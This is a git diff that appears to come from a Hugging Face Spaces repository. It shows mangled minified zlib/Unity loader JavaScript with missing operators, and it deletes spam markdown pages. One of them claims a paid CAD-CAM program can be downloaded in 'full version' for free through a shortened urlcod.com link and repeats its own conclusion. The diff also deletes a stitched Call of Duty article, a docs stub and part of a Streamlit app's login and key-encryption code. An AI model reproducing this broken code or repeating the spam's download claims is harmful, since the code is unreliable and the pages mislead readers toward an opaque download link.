e&&e.state?(n=e.state,t<0?(r=0,t=-t):(r=(t>>4)+1,t<48&&(t&=15)),t&&(t<8||t>15)?O:(null!==n.window&&n.wbits!==t&&(n.window=null),n.wrap=r,n.wbits=t,i(e))):O}function l(e,t){var r,n;return e?(n=new o,e.state=n,n.window=null,r=s(e,t),r!==T&&(e.state=null),r):O}function d(e){return l(e,we)}function u(e){if(ve){var t;for(g=new w.Buf32(512),p=new w.Buf32(32),t=0;t<144;)e.lens[t++]=8;for(;t<256;)e.lens[t++]=9;for(;t<280;)e.lens[t++]=7;for(;t<288;)e.lens[t++]=8;for(x(S,e.lens,0,288,g,0,e.work,{bits:9}),t=0;t<32;)e.lens[t++]=5;x(E,e.lens,0,32,p,0,e.work,{bits:5}),ve=!1}e.lencode=g,e.lenbits=9,e.distcode=p,e.distbits=5}function c(e,t,r,n){var o,a=e.state;return null===a.window&&(a.wsize=1<=a.wsize?(w.arraySet(a.window,t,r-a.wsize,a.wsize,0),a.wnext=0,a.whave=a.wsize):(o=a.wsize-a.wnext,o>n&&(o=n),w.arraySet(a.window,t,r-n,o,a.wnext),n-=o,n?(w.arraySet(a.window,t,r-n,n,0),a.wnext=n,a.whave=a.wsize):(a.wnext+=o,a.wnext===a.wsize&&(a.wnext=0),a.whave>>8&255,r.check=y(r.check,Be,2,0),f=0,h=0,r.mode=N;break}if(r.flags=0,r.head&&(r.head.done=!1),!(1&r.wrap)||(((255&f)<<8)+(f>>8))%31){e.msg="incorrect header check",r.mode=fe;break}if((15&f)!==D){e.msg="unknown compression method",r.mode=fe;break}if(f>>>=4,h-=4,xe=(15&f)+8,0===r.wbits)r.wbits=xe;else if(xe>r.wbits){e.msg="invalid window size",r.mode=fe;break}r.dmax=1<>8&1),512&r.flags&&(Be[0]=255&f,Be[1]=f>>>8&255,r.check=y(r.check,Be,2,0)),f=0,h=0,r.mode=F;case F:for(;h<32;){if(0===l)break e;l--,f+=o[i++]<>>8&255,Be[2]=f>>>16&255,Be[3]=f>>>24&255,r.check=y(r.check,Be,4,0)),f=0,h=0,r.mode=Z;case Z:for(;h<16;){if(0===l)break e;l--,f+=o[i++]<>8),512&r.flags&&(Be[0]=255&f,Be[1]=f>>>8&255,r.check=y(r.check,Be,2,0)),f=0,h=0,r.mode=j;case j:if(1024&r.flags){for(;h<16;){if(0===l)break e;l--,f+=o[i++]<>>8&255,r.check=y(r.check,Be,2,0)),f=0,h=0}else r.head&&(r.head.extra=null);r.mode=H;case H:if(1024&r.flags&&(g=r.length,g>l&&(g=l),g&&(r.head&&(xe=r.head.extra_len-r.length,r.head.extra||(r.head.extra=new Array(r.head.extra_len)),w.arraySet(r.head.extra,o,i,g,xe)),512&r.flags&&(r.check=y(r.check,o,g,i)),l-=g,i+=g,r.length-=g),r.length))break e;r.length=0,r.mode=M;case M:if(2048&r.flags){if(0===l)break e;g=0;do xe=o[i+g++],r.head&&xe&&r.length<65536&&(r.head.name+=String.fromCharCode(xe));while(xe&&g>9&1,r.head.done=!0),e.adler=r.check=0,r.mode=V;break;case q:for(;h<32;){if(0===l)break e;l--,f+=o[i++]<>>=7&h,h-=7&h,r.mode=de;break}for(;h<3;){if(0===l)break e;l--,f+=o[i++]<>>=1,h-=1,3&f){case 0:r.mode=Q;break;case 1:if(u(r),r.mode=re,t===U){f>>>=2,h-=2;break e}break;case 2:r.mode=$;break;case 3:e.msg="invalid block type",r.mode=fe}f>>>=2,h-=2;break;case Q:for(f>>>=7&h,h-=7&h;h<32;){if(0===l)break e;l--,f+=o[i++]<>>16^65535)){e.msg="invalid stored block lengths",r.mode=fe;break}if(r.length=65535&f,f=0,h=0,r.mode=X,t===U)break e;case X:r.mode=J;case J:if(g=r.length){if(g>l&&(g=l),g>d&&(g=d),0===g)break e;w.arraySet(a,o,i,g,s),l-=g,i+=g,d-=g,s+=g,r.length-=g;break}r.mode=V;break;case $:for(;h<14;){if(0===l)break e;l--,f+=o[i++]<>>=5,h-=5,r.ndist=(31&f)+1,f>>>=5,h-=5,r.ncode=(15&f)+4,f>>>=4,h-=4,r.nlen>286||r.ndist>30){e.msg="too many length or distance symbols",r.mode=fe;break}r.have=0,r.mode=ee;case ee:for(;r.have>>=3,h-=3}for(;r.have<19;)r.lens[Ue[r.have++]]=0;if(r.lencode=r.lendyn,r.lenbits=7,Se={bits:r.lenbits},_e=x(_,r.lens,0,19,r.lencode,0,r.work,Se),r.lenbits=Se.bits,_e){e.msg="invalid code lengths set",r.mode=fe;break}r.have=0,r.mode=te;case te:for(;r.have>>24,pe=Ce>>>16&255,we=65535&Ce,!(ge<=h);){if(0===l)break e;l--,f+=o[i++]<>>=ge,h-=ge,r.lens[r.have++]=we;else{if(16===we){for(Ee=ge+2;h>>=ge,h-=ge,0===r.have){e.msg="invalid bit length repeat",r.mode=fe; -break}xe=r.lens[r.have-1],g=3+(3&f),f>>>=2,h-=2}else if(17===we){for(Ee=ge+3;h>>=ge,h-=ge,xe=0,g=3+(7&f),f>>>=3,h-=3}else{for(Ee=ge+7;h>>=ge,h-=ge,xe=0,g=11+(127&f),f>>>=7,h-=7}if(r.have+g>r.nlen+r.ndist){e.msg="invalid bit length repeat",r.mode=fe;break}for(;g--;)r.lens[r.have++]=xe}}if(r.mode===fe)break;if(0===r.lens[256]){e.msg="invalid code -- missing end-of-block",r.mode=fe;break}if(r.lenbits=9,Se={bits:r.lenbits},_e=x(S,r.lens,0,r.nlen,r.lencode,0,r.work,Se),r.lenbits=Se.bits,_e){e.msg="invalid literal/lengths set",r.mode=fe;break}if(r.distbits=6,r.distcode=r.distdyn,Se={bits:r.distbits},_e=x(E,r.lens,r.nlen,r.ndist,r.distcode,0,r.work,Se),r.distbits=Se.bits,_e){e.msg="invalid distances set",r.mode=fe;break}if(r.mode=re,t===U)break e;case re:r.mode=ne;case ne:if(l>=6&&d>=258){e.next_out=s,e.avail_out=d,e.next_in=i,e.avail_in=l,r.hold=f,r.bits=h,k(e,m),s=e.next_out,a=e.output,d=e.avail_out,i=e.next_in,o=e.input,l=e.avail_in,f=r.hold,h=r.bits,r.mode===V&&(r.back=-1);break}for(r.back=0;Ce=r.lencode[f&(1<>>24,pe=Ce>>>16&255,we=65535&Ce,!(ge<=h);){if(0===l)break e;l--,f+=o[i++]<>ve)],ge=Ce>>>24,pe=Ce>>>16&255,we=65535&Ce,!(ve+ge<=h);){if(0===l)break e;l--,f+=o[i++]<>>=ve,h-=ve,r.back+=ve}if(f>>>=ge,h-=ge,r.back+=ge,r.length=we,0===pe){r.mode=le;break}if(32&pe){r.back=-1,r.mode=V;break}if(64&pe){e.msg="invalid literal/length code",r.mode=fe;break}r.extra=15&pe,r.mode=oe;case oe:if(r.extra){for(Ee=r.extra;h>>=r.extra,h-=r.extra,r.back+=r.extra}r.was=r.length,r.mode=ae;case ae:for(;Ce=r.distcode[f&(1<>>24,pe=Ce>>>16&255,we=65535&Ce,!(ge<=h);){if(0===l)break e;l--,f+=o[i++]<>ve)],ge=Ce>>>24,pe=Ce>>>16&255,we=65535&Ce,!(ve+ge<=h);){if(0===l)break e;l--,f+=o[i++]<>>=ve,h-=ve,r.back+=ve}if(f>>>=ge,h-=ge,r.back+=ge,64&pe){e.msg="invalid distance code",r.mode=fe;break}r.offset=we,r.extra=15&pe,r.mode=ie;case ie:if(r.extra){for(Ee=r.extra;h>>=r.extra,h-=r.extra,r.back+=r.extra}if(r.offset>r.dmax){e.msg="invalid distance too far back",r.mode=fe;break}r.mode=se;case se:if(0===d)break e;if(g=m-d,r.offset>g){if(g=r.offset-g,g>r.whave&&r.sane){e.msg="invalid distance too far back",r.mode=fe;break}g>r.wnext?(g-=r.wnext,p=r.wsize-g):p=r.wnext-g,g>r.length&&(g=r.length),me=r.window}else me=a,p=s-r.offset,g=r.length;g>d&&(g=d),d-=g,r.length-=g;do a[s++]=me[p++];while(--g);0===r.length&&(r.mode=ne);break;case le:if(0===d)break e;a[s++]=r.length,d--,r.mode=ne;break;case de:if(r.wrap){for(;h<32;){if(0===l)break e;l--,f|=o[i++]<>>16&65535|0,i=0;0!==r;){i=r>2e3?2e3:r,r-=i;do o=o+t[n++]|0,a=a+o|0;while(--i);o%=65521,a%=65521}return o|a<<16|0}t.exports=n},"zlib/crc32.js":function(e,t,r){"use strict";function n(){for(var e,t=[],r=0;r<256;r++){e=r;for(var n=0;n<8;n++)e=1&e?3988292384^e>>>1:e>>>1;t[r]=e}return t}function o(e,t,r,n){var o=a,i=n+r;e^=-1;for(var s=n;s>>8^o[255&(e^t[s])];return e^-1}var a=n();t.exports=o},"zlib/inffast.js":function(e,t,r){"use strict";var n=30,o=12;t.exports=function(e,t){var r,a,i,s,l,d,u,c,f,h,b,m,g,p,w,v,y,k,x,_,S,E,C,B,U;r=e.state,a=e.next_in,B=e.input,i=a+(e.avail_in-5),s=e.next_out,U=e.output,l=s-(t-e.avail_out),d=s+(e.avail_out-257),u=r.dmax,c=r.wsize,f=r.whave,h=r.wnext,b=r.window,m=r.hold,g=r.bits,p=r.lencode,w=r.distcode,v=(1<>>24,m>>>=x,g-=x,x=k>>>16&255,0===x)U[s++]=65535&k;else{if(!(16&x)){if(0===(64&x)){k=p[(65535&k)+(m&(1<>>=x,g-=x),g<15&&(m+=B[a++]<>>24,m>>>=x,g-=x,x=k>>>16&255,!(16&x)){if(0===(64&x)){k=w[(65535&k)+(m&(1<u){e.msg="invalid distance too far back",r.mode=n;break e}if(m>>>=x,g-=x,x=s-l,S>x){if(x=S-x,x>f&&r.sane){e.msg="invalid distance too far back",r.mode=n;break e}if(E=0,C=b,0===h){if(E+=c-x,x<_){_-=x;do U[s++]=b[E++];while(--x);E=s-S,C=U}}else if(h2;)U[s++]=C[E++],U[s++]=C[E++],U[s++]=C[E++],_-=3;_&&(U[s++]=C[E++],_>1&&(U[s++]=C[E++]))}else{E=s-S;do U[s++]=U[E++],U[s++]=U[E++],U[s++]=U[E++],_-=3;while(_>2);_&&(U[s++]=U[E++],_>1&&(U[s++]=U[E++]))}break}}break}}while(a>3,a-=_,g-=_<<3,m&=(1<=1&&0===j[O];O--);if(I>O&&(I=O),0===O)return m[g++]=20971520,m[g++]=20971520,w.bits=1,0;for(L=1;L0&&(e===s||1!==O))return-1;for(H[1]=0,T=1;Ta||e===d&&z>i)return 1;for(;;){E=T-P,p[R]S?(C=M[W+p[R]],B=F[Z+p[R]]):(C=96,B=0),v=1<>P)+y]=E<<24|C<<16|B|0;while(0!==y);for(v=1<>=1;if(0!==v?(N&=v-1,N+=v):N=0,R++,0===--j[T]){if(T===O)break;T=t[r+p[R]]}if(T>I&&(N&x)!==k){for(0===P&&(P=I),_+=L,A=T-P,D=1<a||e===d&&z>i)return 1;k=N&x,m[k]=I<<24|A<<16|_-g|0}}return 0!==N&&(m[_+N]=T-P<<24|64<<16|0),w.bits=I,0}}};for(var r in t)t[r].folder=r.substring(0,r.lastIndexOf("/")+1);var n=function(e){var r=[];return e=e.split("/").every(function(e){return".."==e?r.pop():"."==e||""==e||r.push(e)})?r.join("/"):null,e?t[e]||t[e+".js"]||t[e+"/index.js"]:null},o=function(e,t){return e?n(e.folder+"node_modules/"+t)||o(e.parent,t):null},a=function(e,t){var r=t.match(/^\//)?null:e?t.match(/^\.\.?\//)?n(e.folder+t):o(e,t):n(t);if(!r)throw"module not found: "+t;return r.exports||(r.parent=e,r(a.bind(null,r),r,r.exports={})),r.exports};return a(null,e)},decompress:function(e){this.exports||(this.exports=this.require("inflate.js"));try{return this.exports.inflate(e)}catch(e){}},hasUnityMarker:function(e){var t=10,r="UnityWeb Compressed Content (gzip)";if(t>e.length||31!=e[0]||139!=e[1])return!1;var n=e[3];if(4&n){if(t+2>e.length)return!1;if(t+=2+e[t]+(e[t+1]<<8),t>e.length)return!1}if(8&n){for(;te.length)return!1;t++}return 16&n&&String.fromCharCode.apply(null,e.subarray(t,t+r.length+1))==r+"\0"}}};return new Promise(function(e,t){f.SystemInfo.hasWebGL?f.SystemInfo.hasWasm?(1==f.SystemInfo.hasWebGL&&f.print('Warning: Your browser does not support "WebGL 2" Graphics API, switching to "WebGL 1"'),f.startupErrorHandler=t,r(0),f.postRun.push(function(){r(1),delete f.startupErrorHandler,e(p)}),c()):t("Your browser does not support WebAssembly."):t("Your browser does not support WebGL.")})} \ No newline at end of file diff --git a/spaces/usbethFlerru/sovits-modelsV2/example/Bobcad V23 FULL Version Download EXCLUSIVE.md b/spaces/usbethFlerru/sovits-modelsV2/example/Bobcad V23 FULL Version Download EXCLUSIVE.md deleted file mode 100644 index 590ab5f823d9dfefe22f8f6e33845f980b197c09..0000000000000000000000000000000000000000 --- a/spaces/usbethFlerru/sovits-modelsV2/example/Bobcad V23 FULL Version Download EXCLUSIVE.md +++ /dev/null @@ -1,47 +0,0 @@ - -

      BobCAD V23 Full Version Download - A Complete Guide

      -

      If you are looking for a powerful and easy-to-use CAD-CAM software that can handle all your CNC machining needs, you might want to consider BobCAD V23 Full Version. This software is designed to help you create 2D and 3D models, assign advanced toolpaths, and generate efficient G-code for your CNC machines. In this article, we will show you how to download BobCAD V23 Full Version for free, what are its key features, and why you should use it for your CNC projects.

      -

      bobcad v23 FULL Version download


      Download Filehttps://urlcod.com/2uyU9h



      - -

      How to Download BobCAD V23 Full Version for Free

      -

      BobCAD V23 Full Version is available for download from the official website of BobCAD-CAM. You can get it by filling out a simple form with your name, email, phone number, and country. You will then receive an email with a link to download the software. You can also request a free demo CD or DVD if you prefer.

      -

      The download file is about 500 MB in size and it will take some time to complete depending on your internet speed. Once you have downloaded the file, you can run it to install the software on your computer. You will need to enter your license key or request a trial key to activate the software. You can also contact a helpful CAD-CAM specialist at 877-262-2231 if you need any assistance.

      - -

      What are the Key Features of BobCAD V23 Full Version

      -

      BobCAD V23 Full Version is a complete CAD-CAM solution that offers many features to help you design and machine your parts faster and easier. Some of the key features are:

      -
        -
      • 2D & 3D Wireframe, Surface, and Solid Modeling Tools: You can create complex geometries using various drawing and editing tools, such as lines, arcs, circles, splines, curves, surfaces, solids, extrude, revolve, sweep, loft, fillet, chamfer, shell, boolean operations, and more.
      • -
      • 2, 3, 4 & 5 Axis Milling and Turning Toolpaths: You can assign various toolpaths to your models, such as contour, pocket, drill, tap, thread mill, engrave, face mill, adaptive roughing, rest machining, pencil trace, project curve, morph between two curves or surfaces, swarf cutting, rotary axis wrapping and indexing, and more.
      • -
      • High Speed Adaptive Machining Strategies: You can use advanced algorithms that adjust the toolpath based on the material conditions and tool load. This results in faster cutting speeds, reduced cycle times, smoother surface finishes, and longer tool life.
      • -
      • Surface Based Toolpaths: You can use surface geometry to define the toolpath direction and shape. This allows you to create complex shapes and patterns that are not possible with traditional toolpaths.
      • -
      • Dynamic Machining Strategies™: You can apply multiple machining strategies to a single feature with a single click. This saves you time and simplifies the programming process.
      • -
      • Wizard Driven Stock & Toolpath Setting Controls: You can use intuitive wizards to define your stock size and shape, select your tools and holders from a library or create your own custom tools, set your feeds and speeds based on material type and tool data, adjust your cutting parameters such as depth of cut, stepover, lead in/out angles and radiuses etc., preview your toolpath in 2D or 3D mode with backplotting and simulation options.
      • -
      • Associative CAM Tree: You can easily manage your toolpaths in a tree structure that shows the relationship between features and operations. You can edit any parameter at any level and see the changes reflected in the toolpath instantly. You can also reorder or copy/paste operations as needed.
      • -
      • Tool & Material Libraries: You can access a huge library of tools and materials that are pre-defined with optimal cutting parameters. You can also create your own custom libraries or import them from other sources.
      • -
      • Backplot & CNC Simulation: You can verify your toolpath before sending it to the machine by using backplotting and simulation options. You can see the tool movement in 2D or 3D mode with different display options such as wireframe or solid mode. You can also check for any errors or collisions with the stock or machine components.
      • -
      • Huge Library of Free Post Processors: You can generate G-code for any CNC machine by using one of the many post processors available for free from BobCAD-CAM. You can also request a custom post processor or modify an existing one if needed.
      • -
      - -

      Why You Should Use BobCAD V23 Full Version for Your CNC Projects

      -

      BobCAD V23 Full Version is a powerful CAD-CAM software that can help you improve your productivity and profitability in CNC machining. Here are some of the benefits of using BobCAD V23 Full Version:

      -

      -
        -
      • You can design and machine any part with ease using the comprehensive modeling and toolpath options.
      • -
      • You can reduce programming time by using the dynamic machining strategies and wizard driven controls.
      • -
      • You can optimize your cutting performance by using the high speed adaptive machining strategies and surface based toolpaths.
      • -
      • You can ensure accuracy and quality by using the backplotting and simulation options.
      • -
      • You can program all your CNC machines within one interface by using the huge library of free post processors.
      • -
      • You can get support from a team of experienced technicians who are ready to help you with any challenge.
      • -
      • You can get started quickly by downloading BobCAD V23 Full Version for free from the official website of BobCAD-CAM.
      • -
      - -

      Conclusion

      -

      BobCAD V23 Full Version is a complete CAD-CAM solution that can help you design and machine any part faster and easier. It offers many features that allow you to create complex geometries, assign advanced toolpaths, -and generate efficient G-code for your CNC machines. It also offers support from a team of experienced technicians who are ready to help you with any challenge. If you want to get started with BobCAD V23 Full Version, -you can download it for free from the official website of BobCAD-CAM. You will not regret it!

      -

      Conclusion

      -

      BobCAD V23 Full Version is a complete CAD-CAM solution that can help you design and machine any part faster and easier. It offers many features that allow you to create complex geometries, assign advanced toolpaths, -and generate efficient G-code for your CNC machines. It also offers support from a team of experienced technicians who are ready to help you with any challenge. If you want to get started with BobCAD V23 Full Version, -you can download it for free from the official website of BobCAD-CAM. You will not regret it!

      3cee63e6c2
      -
      -
      \ No newline at end of file diff --git a/spaces/usbethFlerru/sovits-modelsV2/example/Cod Modern Warfare Multiplayer Tips and Tricks for Every Game Mode.md b/spaces/usbethFlerru/sovits-modelsV2/example/Cod Modern Warfare Multiplayer Tips and Tricks for Every Game Mode.md deleted file mode 100644 index a3647673b078a6e9e49395326b5bb87ee86cbc82..0000000000000000000000000000000000000000 --- a/spaces/usbethFlerru/sovits-modelsV2/example/Cod Modern Warfare Multiplayer Tips and Tricks for Every Game Mode.md +++ /dev/null @@ -1,20 +0,0 @@ - -

      Get ready to play in a variety of settings from a small bustling marketplace to a modern museum nestled in the foothills of the mountains. Modern Warfare II will hit the ground running on day one, ready to welcome newcomers and fierce competitors alike.

      -

      Cod Modern Warfare Multiplayer


      Download Ziphttps://urlcod.com/2uyWhz



      -

      The game takes place in a realistic and modern setting. The campaign follows a CIA officer and British SAS forces as they team up with rebels from the fictional Republic of Urzikstan, combating together against Russian Armed Forces who have invaded the country and the Urzik terrorist group Al-Qatala, while searching for a stolen shipment of chlorine gas. The game's Special Ops mode features cooperative play missions that follow on from the campaign. The multiplayer mode supports cross-platform multiplayer and cross-platform progression for the first time in the series. It has been reworked for gameplay to be more tactical and introduces new features, such as a Realism mode that removes the HUD as well as a form of the Ground War mode that now supports 64 players. A post-launch update introduces a free-to-play battle royale mode, Warzone, which was also marketed as a standalone title. Multiplayer also supports shared screen multiplayer. This mode includes bots, custom maps, custom game-modes and other creative game-interfering actions.

      -

      Infinity Ward began working on the game soon after the release of their 2016 title Call of Duty: Infinite Warfare. They introduced an entirely new engine for the game, which allows for new performance enhancements such as more detailed environments and ray-tracing capabilities. For the campaign, they took influence from real-life conflicts, such as the Syrian Civil War and terrorist incidents that have occurred in London. For the multiplayer, they scrapped the franchise's traditional season pass and removed loot boxes, enabling them to distribute free post-launch content to the playerbase in the form of "Seasons".[4]

      -

      Modern Warfare received praise for its gameplay, campaign, multiplayer, and graphics. Criticism focused on the handling of the campaign's subject matter, including the depiction of the Russian military, as well as balancing issues in the multiplayer. A sequel, titled Modern Warfare II, was released in 2022.

      -

      Modern Warfare's multiplayer has been revised from its predecessors to allow for a more tactical gameplay style, including a focus on map exploration, door breaching, and a Hardcore "Realism" mode that removes the HUD. The mini-map was originally removed in favor of a compass-style marker, with visual cues to detect friendlies and opponents. Following feedback from the multiplayer beta test, Infinity Ward re-implemented the mini-map but removed the appearance of red dots representing enemy players (except for when the UAV killstreak is used). Multiplayer also features the return of Killstreaks (rewards based on kills), with more recent Call of Duty titles having used Scorestreaks (rewards based on score) instead. Killstreaks can, however, be converted into Scorestreaks with the use of an in-game perk called "Pointman". The online modes allow for a larger range of players within a map than previous installments, with a new mode called "Ground War" featuring over 100 players,[7][8][9] while conversely another new mode, "Gunfight", tasks two teams of two players against each other in small matches lasting forty seconds per round.[10] The game includes an extensive weapons customization system, presenting most guns with a range of up to 60 attachments to choose from (five of which can be equipped at any one time).[11] The introduction at the start of multiplayer matches has also been revamped; while in previous titles players would remain motionless on the map as a timer would countdown to zero, players will instead be transported into the battle zone as part of various animations.[8]

      -

      Modern Warfare is the first game in the series since 2013's Call of Duty: Ghosts not to feature a Zombies mode,[12] instead featuring the cooperative "Special Ops" mode previously present in Call of Duty: Modern Warfare 2 and Call of Duty: Modern Warfare 3.[13] Spec Ops shares its narrative with both the campaign and multiplayer.[14] It includes a "Survival" mode, which was a timed exclusive to the PlayStation 4 release until October 2020.[15] At launch, Special Ops features four Operations, which are multi-objective missions that take place in a large open map requiring mandatory 4-player cooperation; and Classic Special Ops, which features smaller scale missions, similar to the original Spec Ops mode.

      -

      Modern Warfare takes place in modern time, with the campaign occurring over the course of several days in late 2019, and the Special Ops and multiplayer modes continuing the story into 2020. The campaign story centers around a rising conflict between Russia and the fictional Republic of Urzikstan, also involving Western military forces. Players assume the roles of three protagonists: British SAS Sergeant Kyle "Gaz" Garrick (Elliot Knight), former Delta Force operator turned CIA SAC/SOG officer "Alex" (Chad Michael Collins), and Urzik rebel leader Farah Karim (Claudia Doumit). The three protagonists work together, alongside SAS Captain John Price (Barry Sloane) and CIA Station Chief Kate Laswell (Rya Kihlstedt). Other allies include U.S. Marine Corps General Lyons (Debra Wilson), Colonel Norris (Nick Boraine), and Demon Dogs leader Sergeant Marcus Griggs (LaMonica Garrett, later replaced by Demetrius Grosse);[b] Farah's elder brother Hadir Karim (Aidan Bristow); "Nikolai" (Stefan Kapičić), head of a Russian PMC acquainted with Price; and Yegor Novak (Alex Feldman), a Ukrainian fixer working for Nikolai. The allied forces are opposed by the Al-Qatala, an Urzik terrorist organization based in Urzikstan led by Omar "The Wolf" Sulaman (Joel Swetow) and his right-hand man Jamal "The Butcher" Rahar (Nick E. Tarabay), as well as General Roman Barkov (Konstantin Lavysh), commander of a rogue Russian faction who treats Farah's rebel forces and the Al-Qatala equally as criminals.

      -

      -

      The game's multiplayer beta in September 2019 was withdrawn for unknown reasons from the PlayStation Store in Russia. A prominent theory posits that this is because the Russian media had been critical of the game's campaign's reportedly favorable portrayal of the White Helmets, a volunteer organisation that operates in parts of opposition-controlled and Turkish-occupied Syria.[39] In October 2019, Sony announced that Modern Warfare would not be sold on the PlayStation Store in Russia.[40]

      -

      Call of Duty: Modern Warfare received "generally favorable reviews" on all platforms according to review aggregator site Metacritic.[41][43][42] The game was praised for its gameplay, campaign (being considered by critics as one of the best in the franchise), multiplayer, graphics, and overall improvements to the Call of Duty formula. However, the campaign received some criticism for aspects in the handling of its subject matter, as well as minor balancing issues with some of the online modes.[51][52][53]

      -

      Modern Warfare has been criticized for its inclusion of white phosphorus strikes as a killstreak in the multiplayer.[80][81] Use of white phosphorus as an incendiary agent is regulated by international law: the provisions of the Convention on Certain Conventional Weapons, specifically the Protocol on Incendiary Weapons, prohibit the use of incendiary weapons against or near civilian areas.[citation needed]

      -

      In a statement to IGN, former U.S. Marine John Phipps criticized the game for failing to realistically portray the effects of the substance, saying "I find Modern Warfare's use as a killstreak reward a nearsighted glorification of what myself and others consider to be a violation of the laws of armed conflict. Contrary to their overall goals towards realism in its campaign, the multiplayer mode in CoD doesn't depict the effect White Phosphorus (WP) has on the human body in any kind of realistic way. I don't object to things like WP being examined in games, so long as we depict them as they truly are".[82] In her review of the game, Kallie Plagge of GameSpot made note of the inclusion of white phosphorus as a killstreak reward in multiplayer and included it in her list of the game's negative aspects, adding that it "goes against everything the campaign stands for".[45]

      -

      Infinity Ward's rebooted Modern Warfare 2 brings back a more classic Call of Duty multiplayer experience than we've seen in recent years, with maps better tailored to traditional 6v6 play and dialed-back movement mechanics. Modern Warfare 2's gameplay really feels like a refreshing return to old times again for Call of Duty, but unfortunately, the package as a whole feels lacking and gun customization is overly complex.

      -

      Editor's note: Given the staggered release of Call of Duty Modern Warfare 2's campaign and multiplayer, as well as Warzone 2.0, GameSpot will be publishing three separate reviews to ensure our verdicts can be delivered in a timely manner, while also giving each of these experiences the focus they need. You can read our Modern Warfare 2 campaign review here.

      -

      Infinity Ward also revealed Sunday the date for the Modern Warfare 2 multiplayer beta. PS4 and PS5 owners will have their first crack at the beta, with those who preordered Modern Warfare 2 getting early access starting Friday, Sept. 16, at 10 a.m. PT/1 p.m. ET. All other PlayStation gamers can jump in the beta starting on Sunday, Sept. 18, and the test will last until Tuesday, Sept. 20. A PS Plus subscription isn't required to be part of the beta.

      -

      Upon returning to the Modern Warfare series, Infinity Ward set out to create a game ripped straight from the real world terrorism that exists in modern-day 2019. A week before the game's reveal, studio narrative director Taylor Kurosaki and single-player director Jacob Minkoff explained to journalists this new game as a more mature, authentic and relevant Call of Duty game that's not a superhero caricature, but instead, a down-to-earth representation of the realities of being a soldier. "It's taking scenarios that are "ripped from the headlines."[5] Among the stated goals for the game's campaign: "Create an emotional connection through the realities of war," and "Push the boundaries of the medium."[6]

      aaccfb2cb3
      -
      -
      \ No newline at end of file diff --git a/spaces/vaishanthr/Simultaneous-Segmented-Depth-Prediction/yolov8/docs/reference/nn/autoshape.md b/spaces/vaishanthr/Simultaneous-Segmented-Depth-Prediction/yolov8/docs/reference/nn/autoshape.md deleted file mode 100644 index b009e090a2a2ee3ca0ca9314537bb9a7e32b71b7..0000000000000000000000000000000000000000 --- a/spaces/vaishanthr/Simultaneous-Segmented-Depth-Prediction/yolov8/docs/reference/nn/autoshape.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -description: Detect 80+ object categories with bounding box coordinates and class probabilities using AutoShape in Ultralytics YOLO. Explore Detections now. -keywords: Ultralytics, YOLO, docs, autoshape, detections, object detection, customized shapes, bounding boxes, computer vision ---- - -## AutoShape ---- -### ::: ultralytics.nn.autoshape.AutoShape -

      - -## Detections ---- -### ::: ultralytics.nn.autoshape.Detections -

      diff --git a/spaces/vanderbilt-dsi/free-speech-app/app.py b/spaces/vanderbilt-dsi/free-speech-app/app.py deleted file mode 100644 index 2d6e7aaf28e592b3d69bab1da1d453de035bd364..0000000000000000000000000000000000000000 --- a/spaces/vanderbilt-dsi/free-speech-app/app.py +++ /dev/null @@ -1,289 +0,0 @@ -import streamlit as st -import streamlit_authenticator as stauth -from deta import Deta -import yaml -from yaml.loader import SafeLoader -import os -from cryptography.fernet import Fernet - -from free_speech_app.DataLoadDb import * -from free_speech_app.FreeSpeechPromptsResponses import * -from langchain.chat_models import ChatOpenAI - - -#connect to/create Deta user database - -deta = Deta(st.secrets["deta_key"]) -db = deta.Base("user_data") - -# fernet key (generated locally, stored in streamlit secrets) -fernet = Fernet(bytes(st.secrets["fernet_key"], 'utf-8')) - -# activeloop_token -os.environ["ACTIVELOOP_TOKEN"] = st.secrets["deeplake_key"] - -config_drive = deta.Drive("passwords") -config = config_drive.get("config.yaml").read() - -config = yaml.load(config, Loader=SafeLoader) - -# Create an authenticator -authenticator = stauth.Authenticate( - config['credentials'], - config['cookie']['name'], - config['cookie']['key'], - config['cookie']['expiry_days'], - config['preauthorized'] -) - - -def get_user_data(user): - data = db.fetch().items - for person in data: - if person['key'] == user: - return person - return None - -def encrypt(api_key: str, fernet) -> bytes: - """Encrypt the API key.""" - return fernet.encrypt(api_key.encode()) - - -def decrypt(encrypted_api_key: bytes, fernet) -> str: - """Decrypt the encrypted API key.""" - return fernet.decrypt(encrypted_api_key).decode() - - -def add_logos(): - st.title("Freequalizer") - left_col_log, right_col_log = st.columns(2) - free_speech_logo = './free_speech_app/logos/Future-of-Free-Speech-logo.png' - vu_logo = './free_speech_app/logos/Vanderbilt-University-Logo.png' - with left_col_log: - st.image(free_speech_logo, caption=None, width=200, use_column_width=None, - clamp=False, channels="RGB", output_format="auto") - with right_col_log: - st.image(vu_logo, caption=None, width=200, use_column_width=None, - clamp=False, channels="RGB", output_format="auto") - - -# Render the login module -add_logos() -name, authentication_status, username = authenticator.login('Login', 'main') - -# If the user is authenticated -if authentication_status: - authenticator.logout('Logout', 'main', key='unique_key') - st.write(f'Welcome *{name}*') - - # Sidebar for navigation - page = st.sidebar.radio("Choose a page", ["Account Setup", "API Key Help", "Respond to Post"]) - - - # Fetch user data from the database - user_data = get_user_data(username) - - if page == "Account Setup": - add_logos() - - st.title("Account Setup") - st.markdown("Please use this page to provide your OpenAI API Key, Principles and Writing Style. **Please make sure to press the Save Changes button after providing the information.**") - - # Input boxes with existing data - - if 'api_key' not in st.session_state: - st.session_state.api_key = "" - api_input = st.text_input("Paste OpenAI API Key", value=decrypt(user_data["api_key"].encode()[ - 2:-1], fernet) if user_data and "api_key" in user_data else "", type="password") - encrypted_api_key = str(encrypt(api_input, fernet)) - st.session_state.api_key = api_input - - principles = st.text_area("My Principles (Paste Principles here)", height = 300, placeholder = "Think about the hate speech you want to counter. What makes you want to write back? Note any principles that are true to your heart, from an abstract thought to a well-defined concept. For ideas, consider: a theory, philosophy, law, policy, workplace professional ethic, cultural norm, family value, idiomatic saying, colloquialism, life lesson, habit, intuition, literary or artistic expression, fortune cookie message, etc.", value=user_data["principles"] if user_data and "principles" in user_data else "") - writing_style = st.text_area("My Writing Style (Paste Examples)", height = 300, placeholder = "Provide examples of your writing style here", value=user_data["writing_style"] if user_data and "writing_style" in user_data else "") - #sources = st.text_area("Sources (This autopopulates for your reference)", value=st.session_state.sources if 'sources' in st.session_state else '', key = 'sources_key', height = 100) - - # Update button - if st.button("Save Changes"): - db.put({"key": username, "principles": principles, "writing_style": writing_style, "api_key": encrypted_api_key}) - - if page == "API Key Help": - add_logos() - - st.title("OpenAI API Key Setup") - - st.header('What is an API key?') - st.write('An API (Application 